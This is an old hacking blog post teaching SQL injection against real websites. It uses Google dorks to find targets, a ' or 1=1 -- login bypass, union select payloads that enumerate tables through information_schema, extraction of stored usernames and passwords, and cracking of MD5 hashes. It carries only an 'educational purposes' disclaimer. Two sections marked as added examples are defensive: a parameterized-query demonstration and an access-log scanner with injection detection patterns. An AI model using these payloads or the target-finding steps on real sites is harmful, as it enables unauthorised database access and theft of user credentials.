Monday, October 31, 2011

SQL Injection


SQL injection is a technique in which the hacker inserts SQL code into a web form to get sensitive information such as user names and passwords. In effect, it is a way to access the website's database without authorization.

The SQL query looks like this in a database:

SELECT * FROM users
WHERE LoginName = '$_GET[LoginName]'
AND password = '$_GET[password]'

After entering a username and password, say admin and admin, the query becomes:

SELECT * FROM users
WHERE LoginName = 'admin'
AND password = 'admin'



HOW TO FIND A SITE VULNERABLE TO SQL INJECTION ?

Google is our friend. So, search using the following terms.

inurl:admin login.asp
inurl:login.asp
etc.

For a complete list of Google hacking keywords, go here. These are famously called Google dorks. All you need is a basic knowledge of advanced Google searching.

1. Use a known username or admin.
2. Enter the string ' or 1=1 -- into the password box.
3. Submit.
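
Why the input in step 2 changes the outcome when the query is built by pasting form values into the SQL text, and why the same input is harmless when the values are bound as parameters. This is an added example, not code from the original post; it uses Python's sqlite3 with an in-memory table, and the table, column and function names and the sample account are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data: one in-memory table with a single account.
    # The password is plaintext only to mirror the post's query.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login_name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret-constructed')")
    return db

def login_concatenated(db, login_name, password):
    # Vulnerable pattern from the post: input is pasted into the SQL text,
    # so a quote in the input ends the string literal and the remainder
    # is parsed as SQL instead of being compared as a password.
    sql = ("SELECT * FROM users WHERE login_name = '" + login_name +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, login_name, password):
    # Hardened form: the SQL text is fixed and the values are bound
    # separately, so the input can only ever be treated as data.
    sql = "SELECT * FROM users WHERE login_name = ? AND password = ?"
    return db.execute(sql, (login_name, password)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    crafted = "' or 1=1 --"  # the password-box input quoted in the post
    for fn in (login_concatenated, login_parameterized):
        print(fn.__name__,
              "| correct password:", fn(db, "admin", "s3cret-constructed"),
              "| wrong password:", fn(db, "admin", "wrong"),
              "| crafted input:", fn(db, "admin", crafted))
```

Only the concatenated version accepts the crafted input; with bound parameters it is compared literally against the stored value and rejected like any other wrong password.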

If you want to find an SQLi vulnerability on a particular website, you can also use Google dorks.

To do this, add a single quote (') at the end of the URL. If you get an error or a blank page, the site is vulnerable to SQL injection.
For example, if the URL is www.examplesite.com/view.php?id=47 then it should become www.examplesite.com/view.php?id=47'

When you add a single quote at the end of the URL, some data of the page is missing. Hence we can determine that it is vulnerable to SQL injection.

FINDING OUT THE NUMBER OF COLUMNS :

We can find this by simply adding an "order by" clause at the end:
www.examplesite.com/view.php?id=47 order by 1

It should return the page with no error.
Now add one more column to the above query. It looks like
www.examplesite.com/view.php?id=47 order by 2
We should increase the count until we get an error. When we get an error, it means that there are no more columns to return the results.

Let us say we got an error at the following query.
www.examplesite.com/view.php?id=47 order by 10
It means that the site has 9 columns.

HOW TO FIND MOST VULNERABLE COLUMN :

www.examplesite.com/view.php?id=47 union select 1,2,3,4,5,6,7,8,9--

It should return the most vulnerable columns.

Sometimes it may not display the columns on your page. In such cases add '-' (without quotes) before your id number. This is to call a non-existing page to display your data, i.e.,

www.examplesite.com/view.php?id=-47 union select 1,2,3,4,5,6,7,8,9--

WHAT ARE THE TABLES IN THE DATABASE ?

www.examplesite.com/view.php?id=-47 union select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables--

It gives us a list of tables.

Now search for the tables you are interested in. It means, a hacker generally looks for the tables that contain usernames and passwords.


So, now we have the table. What next? The columns.

HOW TO FIND OUT THE COLUMN NAMES ?

www.examplesite.com/view.php?id=-47 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name='yourtablename'--


Here, 'yourtablename' refers to the table which you selected recently.

It displays all the column names from the table.



Let us extract the data now.

www.examplesite.com/view.php?id=-47 union select 1,column_name,3,4,5,6,7,8,9 from yourtablename--

Here column_name refers to the desired column name, say usernames.

Similarly, extract the passwords by changing the column name.
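
The requests in the steps above leave a recognisable trail in web server logs. The following added example (not part of the original post) scans access-log lines for it: a quote, "order by N", "union select" or information_schema inside a parameter value, plus the stronger allow-list check that the id parameter is digits only. The log format, the sample lines and all names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = """\
203.0.113.9 - - [31/Oct/2011:10:00:01 +0000] "GET /view.php?id=47 HTTP/1.1" 200 5120
203.0.113.9 - - [31/Oct/2011:10:00:05 +0000] "GET /view.php?id=47' HTTP/1.1" 500 310
203.0.113.9 - - [31/Oct/2011:10:00:09 +0000] "GET /view.php?id=47%20order%20by%2010 HTTP/1.1" 500 310
203.0.113.9 - - [31/Oct/2011:10:00:14 +0000] "GET /view.php?id=-47+union+select+1,table_name,3+from+information_schema.tables-- HTTP/1.1" 200 9001
198.51.100.4 - - [31/Oct/2011:10:01:00 +0000] "GET /view.php?id=12 HTTP/1.1" 200 4800
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
SIGNS = {
    "quote": re.compile(r"'"),
    "order_by": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_lookup": re.compile(r"\binformation_schema\b", re.I),
}

def scan(log_text, numeric_params=("id",)):
    """Return (client, parameter, tags, status) for each suspicious value."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        # parse_qs URL-decodes values, so %20 and + both become spaces.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                tags = [t for t, rx in SIGNS.items() if rx.search(value)]
                # Allow-list check: parameters meant to be integers.
                if name in numeric_params and not re.fullmatch(r"\d+", value):
                    tags.append("non_numeric")
                if tags:
                    findings.append((client, name, sorted(tags), int(status)))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same digits-only check belongs in the application itself: rejecting or integer-casting id before it reaches the query stops every request in this walkthrough, independent of pattern matching.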

Many websites encrypt the passwords using some encryption techniques like MD5 etc. So decrypt them using decryptors.


Via : 101hacker

Note : FOR EDUCATIONAL PURPOSES ONLY. I AM NOT RESPONSIBLE FOR THE CONSEQUENCES.